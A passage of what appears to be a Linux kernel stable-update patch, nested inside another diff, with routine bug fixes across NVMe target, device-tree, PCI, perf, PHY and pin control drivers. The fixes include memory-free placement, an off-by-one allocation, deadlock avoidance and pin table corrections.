+ 	u8 zasl = req->sq->ctrl->subsys->zasl;
+ 	struct nvmet_ctrl *ctrl = req->sq->ctrl;
+@@ -97,7 +97,7 @@ out:
+ 
+ void nvmet_execute_identify_cns_cs_ns(struct nvmet_req *req)
+ {
+-	struct nvme_id_ns_zns *id_zns;
++	struct nvme_id_ns_zns *id_zns = NULL;
+ 	u64 zsze;
+ 	u16 status;
+ 	u32 mar, mor;
+@@ -118,16 +118,18 @@ void nvmet_execute_identify_cns_cs_ns(struct nvmet_req *req)
+ 	if (status)
+ 		goto done;
+ 
+-	if (!bdev_is_zoned(req->ns->bdev)) {
+-		req->error_loc = offsetof(struct nvme_identify, nsid);
+-		goto done;
+-	}
+-
+ 	if (nvmet_ns_revalidate(req->ns)) {
+ 		mutex_lock(&req->ns->subsys->lock);
+ 		nvmet_ns_changed(req->ns->subsys, req->ns->nsid);
+ 		mutex_unlock(&req->ns->subsys->lock);
+ 	}
++
++	if (!bdev_is_zoned(req->ns->bdev)) {
++		status = NVME_SC_INVALID_FIELD | NVME_SC_DNR;
++		req->error_loc = offsetof(struct nvme_identify, nsid);
++		goto out;
++	}
++
+ 	zsze = (bdev_zone_sectors(req->ns->bdev) << 9) >>
+ 					req->ns->blksize_shift;
+ 	id_zns->lbafe[0].zsze = cpu_to_le64(zsze);
+@@ -148,8 +150,8 @@ void nvmet_execute_identify_cns_cs_ns(struct nvmet_req *req)
+ 
+ done:
+ 	status = nvmet_copy_to_sgl(req, 0, id_zns, sizeof(*id_zns));
+-	kfree(id_zns);
+ out:
++	kfree(id_zns);
+ 	nvmet_req_complete(req, status);
+ }
+ 
+diff --git a/drivers/of/device.c b/drivers/of/device.c
+index c674a13c30558..877f50379fab5 100644
+--- a/drivers/of/device.c
++++ b/drivers/of/device.c
+@@ -297,12 +297,15 @@ int of_device_request_module(struct device *dev)
+ 	if (size < 0)
+ 		return size;
+ 
+-	str = kmalloc(size + 1, GFP_KERNEL);
++	/* Reserve an additional byte for the trailing '\0' */
++	size++;
++
++	str = kmalloc(size, GFP_KERNEL);
+ 	if (!str)
+ 		return -ENOMEM;
+ 
+ 	of_device_get_modalias(dev, str, size);
+-	str[size] = '\0';
++	str[size - 1] = '\0';
+ 	ret = request_module(str);
+ 	kfree(str);
+ 
+diff --git a/drivers/pci/controller/dwc/Kconfig b/drivers/pci/controller/dwc/Kconfig
+index 99ec91e2a5cfa..4681eef508899 100644
+--- a/drivers/pci/controller/dwc/Kconfig
++++ b/drivers/pci/controller/dwc/Kconfig
+@@ -286,6 +286,7 @@ config PCIE_KIRIN
+ 	tristate "HiSilicon Kirin series SoCs PCIe controllers"
+ 	depends on PCI_MSI
+ 	select PCIE_DW_HOST
++	select REGMAP_MMIO
+ 	help
+ 	  Say Y here if you want PCIe controller support
+ 	  on HiSilicon Kirin series SoCs.
+diff --git a/drivers/pci/controller/dwc/pci-imx6.c b/drivers/pci/controller/dwc/pci-imx6.c
+index 1dde5c579edc8..47db2d20568ef 100644
+--- a/drivers/pci/controller/dwc/pci-imx6.c
++++ b/drivers/pci/controller/dwc/pci-imx6.c
+@@ -1402,6 +1402,13 @@ DECLARE_PCI_FIXUP_CLASS_HEADER(PCI_VENDOR_ID_SYNOPSYS, 0xabcd,
+ static int __init imx6_pcie_init(void)
+ {
+ #ifdef CONFIG_ARM
++	struct device_node *np;
++
++	np = of_find_matching_node(NULL, imx6_pcie_of_match);
++	if (!np)
++		return -ENODEV;
++	of_node_put(np);
++
+ 	/*
+ 	 * Since probe() can be deferred we need to make sure that
+ 	 * hook_fault_code is not called after __init memory is freed
+diff --git a/drivers/pci/controller/dwc/pcie-qcom.c b/drivers/pci/controller/dwc/pcie-qcom.c
+index 7e23c74fb4230..face42e843968 100644
+--- a/drivers/pci/controller/dwc/pcie-qcom.c
++++ b/drivers/pci/controller/dwc/pcie-qcom.c
+@@ -1279,11 +1279,9 @@ static int qcom_pcie_init_2_7_0(struct qcom_pcie *pcie)
+ 	val &= ~REQ_NOT_ENTR_L1;
+ 	writel(val, pcie->parf + PCIE20_PARF_PM_CTRL);
+ 
+-	if (IS_ENABLED(CONFIG_PCI_MSI)) {
+-		val = readl(pcie->parf + PCIE20_PARF_AXI_MSTR_WR_ADDR_HALT);
+-		val |= BIT(31);
+-		writel(val, pcie->parf + PCIE20_PARF_AXI_MSTR_WR_ADDR_HALT);
+-	}
++	val = readl(pcie->parf + PCIE20_PARF_AXI_MSTR_WR_ADDR_HALT_V2);
++	val |= BIT(31);
++	writel(val, pcie->parf + PCIE20_PARF_AXI_MSTR_WR_ADDR_HALT_V2);
+ 
+ 	return 0;
+ err_disable_clocks:
+diff --git a/drivers/pci/hotplug/pciehp_pci.c b/drivers/pci/hotplug/pciehp_pci.c
+index d17f3bf36f709..ad12515a4a121 100644
+--- a/drivers/pci/hotplug/pciehp_pci.c
++++ b/drivers/pci/hotplug/pciehp_pci.c
+@@ -63,7 +63,14 @@ int pciehp_configure_device(struct controller *ctrl)
+ 
+ 	pci_assign_unassigned_bridge_resources(bridge);
+ 	pcie_bus_configure_settings(parent);
++
++	/*
++	 * Release reset_lock during driver binding
++	 * to avoid AB-BA deadlock with device_lock.
++	 */
++	up_read(&ctrl->reset_lock);
+ 	pci_bus_add_devices(parent);
++	down_read_nested(&ctrl->reset_lock, ctrl->depth);
+ 
+  out:
+ 	pci_unlock_rescan_remove();
+@@ -104,7 +111,15 @@ void pciehp_unconfigure_device(struct controller *ctrl, bool presence)
+ 	list_for_each_entry_safe_reverse(dev, temp, &parent->devices,
+ 					 bus_list) {
+ 		pci_dev_get(dev);
++
++		/*
++		 * Release reset_lock during driver unbinding
++		 * to avoid AB-BA deadlock with device_lock.
++		 */
++		up_read(&ctrl->reset_lock);
+ 		pci_stop_and_remove_bus_device(dev);
++		down_read_nested(&ctrl->reset_lock, ctrl->depth);
++
+ 		/*
+ 		 * Ensure that no new Requests will be generated from
+ 		 * the device.
+diff --git a/drivers/pci/pcie/edr.c b/drivers/pci/pcie/edr.c
+index a6b9b479b97ad..87734e4c3c204 100644
+--- a/drivers/pci/pcie/edr.c
++++ b/drivers/pci/pcie/edr.c
+@@ -193,6 +193,7 @@ send_ost:
+ 	 */
+ 	if (estate == PCI_ERS_RESULT_RECOVERED) {
+ 		pci_dbg(edev, "DPC port successfully recovered\n");
++		pcie_clear_device_status(edev);
+ 		acpi_send_edr_status(pdev, edev, EDR_OST_SUCCESS);
+ 	} else {
+ 		pci_dbg(edev, "DPC port recovery failed\n");
+diff --git a/drivers/pci/quirks.c b/drivers/pci/quirks.c
+index 494fa46f57671..8d32a3834688f 100644
+--- a/drivers/pci/quirks.c
++++ b/drivers/pci/quirks.c
+@@ -1939,6 +1939,19 @@ static void quirk_radeon_pm(struct pci_dev *dev)
+ }
+ DECLARE_PCI_FIXUP_FINAL(PCI_VENDOR_ID_ATI, 0x6741, quirk_radeon_pm);
+ 
++/*
++ * NVIDIA Ampere-based HDA controllers can wedge the whole device if a bus
++ * reset is performed too soon after transition to D0, extend d3hot_delay
++ * to previous effective default for all NVIDIA HDA controllers.
++ */
++static void quirk_nvidia_hda_pm(struct pci_dev *dev)
++{
++	quirk_d3hot_delay(dev, 20);
++}
++DECLARE_PCI_FIXUP_CLASS_FINAL(PCI_VENDOR_ID_NVIDIA, PCI_ANY_ID,
++			      PCI_CLASS_MULTIMEDIA_HD_AUDIO, 8,
++			      quirk_nvidia_hda_pm);
++
+ /*
+  * Ryzen5/7 XHCI controllers fail upon resume from runtime suspend or s2idle.
+  * https://bugzilla.kernel.org/show_bug.cgi?id=205587
+diff --git a/drivers/perf/amlogic/meson_ddr_pmu_core.c b/drivers/perf/amlogic/meson_ddr_pmu_core.c
+index b84346dbac2ce..0b24dee1ed3cf 100644
+--- a/drivers/perf/amlogic/meson_ddr_pmu_core.c
++++ b/drivers/perf/amlogic/meson_ddr_pmu_core.c
+@@ -156,10 +156,14 @@ static int meson_ddr_perf_event_add(struct perf_event *event, int flags)
+ 	u64 config2 = event->attr.config2;
+ 	int i;
+ 
+-	for_each_set_bit(i, (const unsigned long *)&config1, sizeof(config1))
++	for_each_set_bit(i,
++			 (const unsigned long *)&config1,
++			 BITS_PER_TYPE(config1))
+ 		meson_ddr_set_axi_filter(event, i);
+ 
+-	for_each_set_bit(i, (const unsigned long *)&config2, sizeof(config2))
++	for_each_set_bit(i,
++			 (const unsigned long *)&config2,
++			 BITS_PER_TYPE(config2))
+ 		meson_ddr_set_axi_filter(event, i + 64);
+ 
+ 	if (flags & PERF_EF_START)
+diff --git a/drivers/perf/arm-cmn.c b/drivers/perf/arm-cmn.c
+index 1deb61b22bc76..ff86075edca48 100644
+--- a/drivers/perf/arm-cmn.c
++++ b/drivers/perf/arm-cmn.c
+@@ -57,14 +57,12 @@
+ #define CMN_INFO_REQ_VC_NUM		GENMASK_ULL(1, 0)
+ 
+ /* XPs also have some local topology info which has uses too */
+-#define CMN_MXP__CONNECT_INFO_P0	0x0008
+-#define CMN_MXP__CONNECT_INFO_P1	0x0010
+-#define CMN_MXP__CONNECT_INFO_P2	0x0028
+-#define CMN_MXP__CONNECT_INFO_P3	0x0030
+-#define CMN_MXP__CONNECT_INFO_P4	0x0038
+-#define CMN_MXP__CONNECT_INFO_P5	0x0040
++#define CMN_MXP__CONNECT_INFO(p)	(0x0008 + 8 * (p))
+ #define CMN__CONNECT_INFO_DEVICE_TYPE	GENMASK_ULL(4, 0)
+ 
++#define CMN_MAX_PORTS			6
++#define CI700_CONNECT_INFO_P2_5_OFFSET	0x10
++
+ /* PMU registers occupy the 3rd 4KB page of each node's region */
+ #define CMN_PMU_OFFSET			0x2000
+ 
+@@ -166,7 +164,7 @@
+ #define CMN_EVENT_BYNODEID(event)	FIELD_GET(CMN_CONFIG_BYNODEID, (event)->attr.config)
+ #define CMN_EVENT_NODEID(event)		FIELD_GET(CMN_CONFIG_NODEID, (event)->attr.config)
+ 
+-#define CMN_CONFIG_WP_COMBINE		GENMASK_ULL(27, 24)
++#define CMN_CONFIG_WP_COMBINE		GENMASK_ULL(30, 27)
+ #define CMN_CONFIG_WP_DEV_SEL		GENMASK_ULL(50, 48)
+ #define CMN_CONFIG_WP_CHN_SEL		GENMASK_ULL(55, 51)
+ /* Note that we don't yet support the tertiary match group on newer IPs */
+@@ -396,6 +394,25 @@ static struct arm_cmn_node *arm_cmn_node(const struct arm_cmn *cmn,
+ 	return NULL;
+ }
+ 
++static u32 arm_cmn_device_connect_info(const struct arm_cmn *cmn,
++				       const struct arm_cmn_node *xp, int port)
++{
++	int offset = CMN_MXP__CONNECT_INFO(port);
++
++	if (port >= 2) {
++		if (cmn->model & (CMN600 | CMN650))
++			return 0;
++		/*
++		 * CI-700 may have extra ports, but still has the
++		 * mesh_port_connect_info registers in the way.
++		 */
++		if (cmn->model == CI700)
++			offset += CI700_CONNECT_INFO_P2_5_OFFSET;
++	}
++
++	return readl_relaxed(xp->pmu_base - CMN_PMU_OFFSET + offset);
++}
++
+ static struct dentry *arm_cmn_debugfs;
+ 
+ #ifdef CONFIG_DEBUG_FS
+@@ -469,7 +486,7 @@ static int arm_cmn_map_show(struct seq_file *s, void *data)
+ 	y = cmn->mesh_y;
+ 	while (y--) {
+ 		int xp_base = cmn->mesh_x * y;
+-		u8 port[6][CMN_MAX_DIMENSION];
++		u8 port[CMN_MAX_PORTS][CMN_MAX_DIMENSION];
+ 
+ 		for (x = 0; x < cmn->mesh_x; x++)
+ 			seq_puts(s, "--------+");
+@@ -477,14 +494,9 @@ static int arm_cmn_map_show(struct seq_file *s, void *data)
+ 		seq_printf(s, "\n%d    |", y);
+ 		for (x = 0; x < cmn->mesh_x; x++) {
+ 			struct arm_cmn_node *xp = cmn->xps + xp_base + x;
+-			void __iomem *base = xp->pmu_base - CMN_PMU_OFFSET;
+-
+-			port[0][x] = readl_relaxed(base + CMN_MXP__CONNECT_INFO_P0);
+-			port[1][x] = readl_relaxed(base + CMN_MXP__CONNECT_INFO_P1);
+-			port[2][x] = readl_relaxed(base + CMN_MXP__CONNECT_INFO_P2);
+-			port[3][x] = readl_relaxed(base + CMN_MXP__CONNECT_INFO_P3);
+-			port[4][x] = readl_relaxed(base + CMN_MXP__CONNECT_INFO_P4);
+-			port[5][x] = readl_relaxed(base + CMN_MXP__CONNECT_INFO_P5);
++
++			for (p = 0; p < CMN_MAX_PORTS; p++)
++				port[p][x] = arm_cmn_device_connect_info(cmn, xp, p);
+ 			seq_printf(s, " XP #%-2d |", xp_base + x);
+ 		}
+ 
+@@ -2082,18 +2094,9 @@ static int arm_cmn_discover(struct arm_cmn *cmn, unsigned int rgn_offset)
+ 		 * from this, since in that case we will see at least one XP
+ 		 * with port 2 connected, for the HN-D.
+ 		 */
+-		if (readq_relaxed(xp_region + CMN_MXP__CONNECT_INFO_P0))
+-			xp_ports |= BIT(0);
+-		if (readq_relaxed(xp_region + CMN_MXP__CONNECT_INFO_P1))
+-			xp_ports |= BIT(1);
+-		if (readq_relaxed(xp_region + CMN_MXP__CONNECT_INFO_P2))
+-			xp_ports |= BIT(2);
+-		if (readq_relaxed(xp_region + CMN_MXP__CONNECT_INFO_P3))
+-			xp_ports |= BIT(3);
+-		if (readq_relaxed(xp_region + CMN_MXP__CONNECT_INFO_P4))
+-			xp_ports |= BIT(4);
+-		if (readq_relaxed(xp_region + CMN_MXP__CONNECT_INFO_P5))
+-			xp_ports |= BIT(5);
++		for (int p = 0; p < CMN_MAX_PORTS; p++)
++			if (arm_cmn_device_connect_info(cmn, xp, p))
++				xp_ports |= BIT(p);
+ 
+ 		if (cmn->multi_dtm && (xp_ports & 0xc))
+ 			arm_cmn_init_dtm(dtm++, xp, 1);
+diff --git a/drivers/perf/riscv_pmu_sbi.c b/drivers/perf/riscv_pmu_sbi.c
+index f6507efe2a584..6f9ca2c42ffe1 100644
+--- a/drivers/perf/riscv_pmu_sbi.c
++++ b/drivers/perf/riscv_pmu_sbi.c
+@@ -883,7 +883,7 @@ static int __init pmu_sbi_devinit(void)
+ 	struct platform_device *pdev;
+ 
+ 	if (sbi_spec_version < sbi_mk_version(0, 3) ||
+-	    sbi_probe_extension(SBI_EXT_PMU) <= 0) {
++	    !sbi_probe_extension(SBI_EXT_PMU)) {
+ 		return 0;
+ 	}
+ 
+diff --git a/drivers/phy/qualcomm/phy-qcom-qmp-pcie.c b/drivers/phy/qualcomm/phy-qcom-qmp-pcie.c
+index 1b136a87053f8..390380313f760 100644
+--- a/drivers/phy/qualcomm/phy-qcom-qmp-pcie.c
++++ b/drivers/phy/qualcomm/phy-qcom-qmp-pcie.c
+@@ -1854,7 +1854,7 @@ static const struct qmp_phy_cfg msm8998_pciephy_cfg = {
+ };
+ 
+ static const struct qmp_phy_cfg sc8180x_pciephy_cfg = {
+-	.lanes			= 1,
++	.lanes			= 2,
+ 
+ 	.tbls = {
+ 		.serdes		= sc8180x_qmp_pcie_serdes_tbl,
+diff --git a/drivers/phy/tegra/xusb.c b/drivers/phy/tegra/xusb.c
+index ff4b930879f3c..58eeda573b677 100644
+--- a/drivers/phy/tegra/xusb.c
++++ b/drivers/phy/tegra/xusb.c
+@@ -782,6 +782,7 @@ static int tegra_xusb_add_usb2_port(struct tegra_xusb_padctl *padctl,
+ 	usb2->base.lane = usb2->base.ops->map(&usb2->base);
+ 	if (IS_ERR(usb2->base.lane)) {
+ 		err = PTR_ERR(usb2->base.lane);
++		tegra_xusb_port_unregister(&usb2->base);
+ 		goto out;
+ 	}
+ 
+@@ -848,6 +849,7 @@ static int tegra_xusb_add_ulpi_port(struct tegra_xusb_padctl *padctl,
+ 	ulpi->base.lane = ulpi->base.ops->map(&ulpi->base);
+ 	if (IS_ERR(ulpi->base.lane)) {
+ 		err = PTR_ERR(ulpi->base.lane);
++		tegra_xusb_port_unregister(&ulpi->base);
+ 		goto out;
+ 	}
+ 
+diff --git a/drivers/phy/ti/phy-j721e-wiz.c b/drivers/phy/ti/phy-j721e-wiz.c
+index ddce5ef7711c6..c21b193fb5498 100644
+--- a/drivers/phy/ti/phy-j721e-wiz.c
++++ b/drivers/phy/ti/phy-j721e-wiz.c
+@@ -430,18 +430,17 @@ static int wiz_mode_select(struct wiz *wiz)
+ 	int i;
+ 
+ 	for (i = 0; i < num_lanes; i++) {
+-		if (wiz->lane_phy_type[i] == PHY_TYPE_DP)
++		if (wiz->lane_phy_type[i] == PHY_TYPE_DP) {
+ 			mode = LANE_MODE_GEN1;
+-		else if (wiz->lane_phy_type[i] == PHY_TYPE_QSGMII)
++		} else if (wiz->lane_phy_type[i] == PHY_TYPE_QSGMII) {
+ 			mode = LANE_MODE_GEN2;
+-		else
+-			continue;
+-
+-		if (wiz->lane_phy_type[i] == PHY_TYPE_USXGMII) {
++		} else if (wiz->lane_phy_type[i] == PHY_TYPE_USXGMII) {
+ 			ret = regmap_field_write(wiz->p0_mac_src_sel[i], 0x3);
+ 			ret = regmap_field_write(wiz->p0_rxfclk_sel[i], 0x3);
+ 			ret = regmap_field_write(wiz->p0_refclk_sel[i], 0x3);
+ 			mode = LANE_MODE_GEN1;
++		} else {
++			continue;
+ 		}
+ 
+ 		ret = regmap_field_write(wiz->p_standard_mode[i], mode);
+diff --git a/drivers/pinctrl/bcm/pinctrl-bcm2835.c b/drivers/pinctrl/bcm/pinctrl-bcm2835.c
+index c7cdccdb4332a..0f1ab0829ffe6 100644
+--- a/drivers/pinctrl/bcm/pinctrl-bcm2835.c
++++ b/drivers/pinctrl/bcm/pinctrl-bcm2835.c
+@@ -90,6 +90,8 @@ struct bcm2835_pinctrl {
+ 	struct pinctrl_gpio_range gpio_range;
+ 
+ 	raw_spinlock_t irq_lock[BCM2835_NUM_BANKS];
++	/* Protect FSEL registers */
++	spinlock_t fsel_lock;
+ };
+ 
+ /* pins are just named GPIO0..GPIO53 */
+@@ -284,14 +286,19 @@ static inline void bcm2835_pinctrl_fsel_set(
+ 		struct bcm2835_pinctrl *pc, unsigned pin,
+ 		enum bcm2835_fsel fsel)
+ {
+-	u32 val = bcm2835_gpio_rd(pc, FSEL_REG(pin));
+-	enum bcm2835_fsel cur = (val >> FSEL_SHIFT(pin)) & BCM2835_FSEL_MASK;
++	u32 val;
++	enum bcm2835_fsel cur;
++	unsigned long flags;
++
++	spin_lock_irqsave(&pc->fsel_lock, flags);
++	val = bcm2835_gpio_rd(pc, FSEL_REG(pin));
++	cur = (val >> FSEL_SHIFT(pin)) & BCM2835_FSEL_MASK;
+ 
+ 	dev_dbg(pc->dev, "read %08x (%u => %s)\n", val, pin,
+-			bcm2835_functions[cur]);
++		bcm2835_functions[cur]);
+ 
+ 	if (cur == fsel)
+-		return;
++		goto unlock;
+ 
+ 	if (cur != BCM2835_FSEL_GPIO_IN && fsel != BCM2835_FSEL_GPIO_IN) {
+ 		/* always transition through GPIO_IN */
+@@ -309,6 +316,9 @@ static inline void bcm2835_pinctrl_fsel_set(
+ 	dev_dbg(pc->dev, "write %08x (%u <= %s)\n", val, pin,
+ 			bcm2835_functions[fsel]);
+ 	bcm2835_gpio_wr(pc, FSEL_REG(pin), val);
++
++unlock:
++	spin_unlock_irqrestore(&pc->fsel_lock, flags);
+ }
+ 
+ static int bcm2835_gpio_direction_input(struct gpio_chip *chip, unsigned offset)
+@@ -1248,6 +1258,7 @@ static int bcm2835_pinctrl_probe(struct platform_device *pdev)
+ 	pc->gpio_chip = *pdata->gpio_chip;
+ 	pc->gpio_chip.parent = dev;
+ 
++	spin_lock_init(&pc->fsel_lock);
+ 	for (i = 0; i < BCM2835_NUM_BANKS; i++) {
+ 		unsigned long events;
+ 		unsigned offset;
+diff --git a/drivers/pinctrl/qcom/pinctrl-lpass-lpi.c b/drivers/pinctrl/qcom/pinctrl-lpass-lpi.c
+index 3dc670faa59ec..2ee5294c21d8e 100644
+--- a/drivers/pinctrl/qcom/pinctrl-lpass-lpi.c
++++ b/drivers/pinctrl/qcom/pinctrl-lpass-lpi.c
+@@ -221,6 +221,15 @@ static int lpi_config_set(struct pinctrl_dev *pctldev, unsigned int group,
+ 		}
+ 	}
+ 
++	/*
++	 * As per Hardware Programming Guide, when configuring pin as output,
++	 * set the pin value before setting output-enable (OE).
++	 */
++	if (output_enabled) {
++		val = u32_encode_bits(value ? 1 : 0, LPI_GPIO_VALUE_OUT_MASK);
++		lpi_gpio_write(pctrl, group, LPI_GPIO_VALUE_REG, val);
++	}
++
+ 	val = lpi_gpio_read(pctrl, group, LPI_GPIO_CFG_REG);
+ 
+ 	u32p_replace_bits(&val, pullup, LPI_GPIO_PULL_MASK);
+@@ -230,11 +239,6 @@ static int lpi_config_set(struct pinctrl_dev *pctldev, unsigned int group,
+ 
+ 	lpi_gpio_write(pctrl, group, LPI_GPIO_CFG_REG, val);
+ 
+-	if (output_enabled) {
+-		val = u32_encode_bits(value ? 1 : 0, LPI_GPIO_VALUE_OUT_MASK);
+-		lpi_gpio_write(pctrl, group, LPI_GPIO_VALUE_REG, val);
+-	}
+-
+ 	return 0;
+ }
+ 
+diff --git a/drivers/pinctrl/ralink/pinctrl-mt7620.c b/drivers/pinctrl/ralink/pinctrl-mt7620.c
+index 22ff16eff02ff..929a1ace56aeb 100644
+--- a/drivers/pinctrl/ralink/pinctrl-mt7620.c
++++ b/drivers/pinctrl/ralink/pinctrl-mt7620.c
+@@ -372,6 +372,7 @@ static int mt7620_pinctrl_probe(struct platform_device *pdev)
+ 
+ static const struct of_device_id mt7620_pinctrl_match[] = {
+ 	{ .compatible = "ralink,mt7620-pinctrl" },
++	{ .compatible = "ralink,rt2880-pinmux" },
+ 	{}
+ };
+ MODULE_DEVICE_TABLE(of, mt7620_pinctrl_match);
+diff --git a/drivers/pinctrl/ralink/pinctrl-mt7621.c b/drivers/pinctrl/ralink/pinctrl-mt7621.c
+index b47968f40e0c2..0297cf455b3a0 100644
+--- a/drivers/pinctrl/ralink/pinctrl-mt7621.c
++++ b/drivers/pinctrl/ralink/pinctrl-mt7621.c
+@@ -97,6 +97,7 @@ static int mt7621_pinctrl_probe(struct platform_device *pdev)
+ 
+ static const struct of_device_id mt7621_pinctrl_match[] = {
+ 	{ .compatible = "ralink,mt7621-pinctrl" },
++	{ .compatible = "ralink,rt2880-pinmux" },
+ 	{}
+ };
+ MODULE_DEVICE_TABLE(of, mt7621_pinctrl_match);
+diff --git a/drivers/pinctrl/ralink/pinctrl-rt2880.c b/drivers/pinctrl/ralink/pinctrl-rt2880.c
+index 811e12df11331..fd9af7c2ffd0e 100644
+--- a/drivers/pinctrl/ralink/pinctrl-rt2880.c
++++ b/drivers/pinctrl/ralink/pinctrl-rt2880.c
+@@ -41,6 +41,7 @@ static int rt2880_pinctrl_probe(struct platform_device *pdev)
+ 
+ static const struct of_device_id rt2880_pinctrl_match[] = {
+ 	{ .compatible = "ralink,rt2880-pinctrl" },
++	{ .compatible = "ralink,rt2880-pinmux" },
+ 	{}
+ };
+ MODULE_DEVICE_TABLE(of, rt2880_pinctrl_match);
+diff --git a/drivers/pinctrl/ralink/pinctrl-rt305x.c b/drivers/pinctrl/ralink/pinctrl-rt305x.c
+index 5b204b7ca1f3c..13a012a65d1d8 100644
+--- a/drivers/pinctrl/ralink/pinctrl-rt305x.c
++++ b/drivers/pinctrl/ralink/pinctrl-rt305x.c
+@@ -118,6 +118,7 @@ static int rt305x_pinctrl_probe(struct platform_device *pdev)
+ 
+ static const struct of_device_id rt305x_pinctrl_match[] = {
+ 	{ .compatible = "ralink,rt305x-pinctrl" },
++	{ .compatible = "ralink,rt2880-pinmux" },
+ 	{}
+ };
+ MODULE_DEVICE_TABLE(of, rt305x_pinctrl_match);
+diff --git a/drivers/pinctrl/ralink/pinctrl-rt3883.c b/drivers/pinctrl/ralink/pinctrl-rt3883.c
+index 44a66c3d2d2a1..b263764011e76 100644
+--- a/drivers/pinctrl/ralink/pinctrl-rt3883.c
++++ b/drivers/pinctrl/ralink/pinctrl-rt3883.c
+@@ -88,6 +88,7 @@ static int rt3883_pinctrl_probe(struct platform_device *pdev)
+ 
+ static const struct of_device_id rt3883_pinctrl_match[] = {
+ 	{ .compatible = "ralink,rt3883-pinctrl" },
++	{ .compatible = "ralink,rt2880-pinmux" },
+ 	{}
+ };
+ MODULE_DEVICE_TABLE(of, rt3883_pinctrl_match);
+diff --git a/drivers/pinctrl/renesas/pfc-r8a779a0.c b/drivers/pinctrl/renesas/pfc-r8a779a0.c
+index 760c83a8740bd..6069869353bb4 100644
+--- a/drivers/pinctrl/renesas/pfc-r8a779a0.c
++++ b/drivers/pinctrl/renesas/pfc-r8a779a0.c
+@@ -696,16 +696,8 @@ static const u16 pinmux_data[] = {
+ 	PINMUX_SINGLE(PCIE0_CLKREQ_N),
+ 
+ 	PINMUX_SINGLE(AVB0_PHY_INT),
+-	PINMUX_SINGLE(AVB0_MAGIC),
+-	PINMUX_SINGLE(AVB0_MDC),
+-	PINMUX_SINGLE(AVB0_MDIO),
+-	PINMUX_SINGLE(AVB0_TXCREFCLK),
+ 
+ 	PINMUX_SINGLE(AVB1_PHY_INT),
+-	PINMUX_SINGLE(AVB1_MAGIC),
+-	PINMUX_SINGLE(AVB1_MDC),
+-	PINMUX_SINGLE(AVB1_MDIO),
+-	PINMUX_SINGLE(AVB1_TXCREFCLK),
+ 
+ 	PINMUX_SINGLE(AVB2_AVTP_PPS),
+ 	PINMUX_SINGLE(AVB2_AVTP_CAPTURE),
+diff --git a/drivers/pinctrl/renesas/pfc-r8a779f0.c b/drivers/pinctrl/renesas/pfc-r8a779f0.c
+index 417c357f16b19..65c141ce909ac 100644
+--- a/drivers/pinctrl/renesas/pfc-r8a779f0.c
++++ b/drivers/pinctrl/renesas/pfc-r8a779f0.c
+@@ -1213,7 +1213,7 @@ static const unsigned int tsn1_avtp_pps_pins[] = {
+ 	RCAR_GP_PIN(3, 13),
+ };
+ static const unsigned int tsn1_avtp_pps_mux[] = {
+-	TSN0_AVTP_PPS_MARK,
++	TSN1_AVTP_PPS_MARK,
+ };
+ static const unsigned int tsn1_avtp_capture_a_pins[] = {
+ 	/* TSN1_AVTP_CAPTURE_A */
+diff --git a/drivers/pinctrl/renesas/pfc-r8a779g0.c b/drivers/pinctrl/renesas/pfc-r8a779g0.c
+index 5dd1c2c7708a8..43a63a21a6fb5 100644
+--- a/drivers/pinctrl/renesas/pfc-r8a779g0.c
++++ b/drivers/pinctrl/renesas/pfc-r8a779g0.c
+@@ -156,54 +156,54 @@
+ #define GPSR3_0		F_(MMC_SD_D1,		IP0SR3_3_0)
+ 
+ /* GPSR4 */
+-#define GPSR4_24	FM(AVS1)
+-#define GPSR4_23	FM(AVS0)
+-#define GPSR4_22	FM(PCIE1_CLKREQ_N)
+-#define GPSR4_21	FM(PCIE0_CLKREQ_N)
+-#define GPSR4_20	FM(TSN0_TXCREFCLK)
+-#define GPSR4_19	FM(TSN0_TD2)
+-#define GPSR4_18	FM(TSN0_TD3)
+-#define GPSR4_17	FM(TSN0_RD2)
+-#define GPSR4_16	FM(TSN0_RD3)
+-#define GPSR4_15	FM(TSN0_TD0)
+-#define GPSR4_14	FM(TSN0_TD1)
+-#define GPSR4_13	FM(TSN0_RD1)
+-#define GPSR4_12	FM(TSN0_TXC)
+-#define GPSR4_11	FM(TSN0_RXC)
+-#define GPSR4_10	FM(TSN0_RD0)
+-#define GPSR4_9		FM(TSN0_TX_CTL)
+-#define GPSR4_8		FM(TSN0_AVTP_PPS0)
+-#define GPSR4_7		FM(TSN0_RX_CTL)
+-#define GPSR4_6		FM(TSN0_AVTP_CAPTURE)
+-#define GPSR4_5		FM(TSN0_AVTP_MATCH)
+-#define GPSR4_4		FM(TSN0_LINK)
+-#define GPSR4_3		FM(TSN0_PHY_INT)
+-#define GPSR4_2		FM(TSN0_AVTP_PPS1)
+-#define GPSR4_1		FM(TSN0_MDC)
+-#define GPSR4_0		FM(TSN0_MDIO)
++#define GPSR4_24	F_(AVS1,		IP3SR4_3_0)
++#define GPSR4_23	F_(AVS0,		IP2SR4_31_28)
++#define GPSR4_22	F_(PCIE1_CLKREQ_N,	IP2SR4_27_24)
++#define GPSR4_21	F_(PCIE0_CLKREQ_N,	IP2SR4_23_20)
++#define GPSR4_20	F_(TSN0_TXCREFCLK,	IP2SR4_19_16)
++#define GPSR4_19	F_(TSN0_TD2,		IP2SR4_15_12)
++#define GPSR4_18	F_(TSN0_TD3,		IP2SR4_11_8)
++#define GPSR4_17	F_(TSN0_RD2,		IP2SR4_7_4)
++#define GPSR4_16	F_(TSN0_RD3,		IP2SR4_3_0)
++#define GPSR4_15	F_(TSN0_TD0,		IP1SR4_31_28)
++#define GPSR4_14	F_(TSN0_TD1,		IP1SR4_27_24)
++#define GPSR4_13	F_(TSN0_RD1,		IP1SR4_23_20)
++#define GPSR4_12	F_(TSN0_TXC,		IP1SR4_19_16)
++#define GPSR4_11	F_(TSN0_RXC,		IP1SR4_15_12)
++#define GPSR4_10	F_(TSN0_RD0,		IP1SR4_11_8)
++#define GPSR4_9		F_(TSN0_TX_CTL,		IP1SR4_7_4)
++#define GPSR4_8		F_(TSN0_AVTP_PPS0,	IP1SR4_3_0)
++#define GPSR4_7		F_(TSN0_RX_CTL,		IP0SR4_31_28)
++#define GPSR4_6		F_(TSN0_AVTP_CAPTURE,	IP0SR4_27_24)
++#define GPSR4_5		F_(TSN0_AVTP_MATCH,	IP0SR4_23_20)
++#define GPSR4_4		F_(TSN0_LINK,		IP0SR4_19_16)
++#define GPSR4_3		F_(TSN0_PHY_INT,	IP0SR4_15_12)
++#define GPSR4_2		F_(TSN0_AVTP_PPS1,	IP0SR4_11_8)
++#define GPSR4_1		F_(TSN0_MDC,		IP0SR4_7_4)
++#define GPSR4_0		F_(TSN0_MDIO,		IP0SR4_3_0)
+ 
+ /* GPSR 5 */
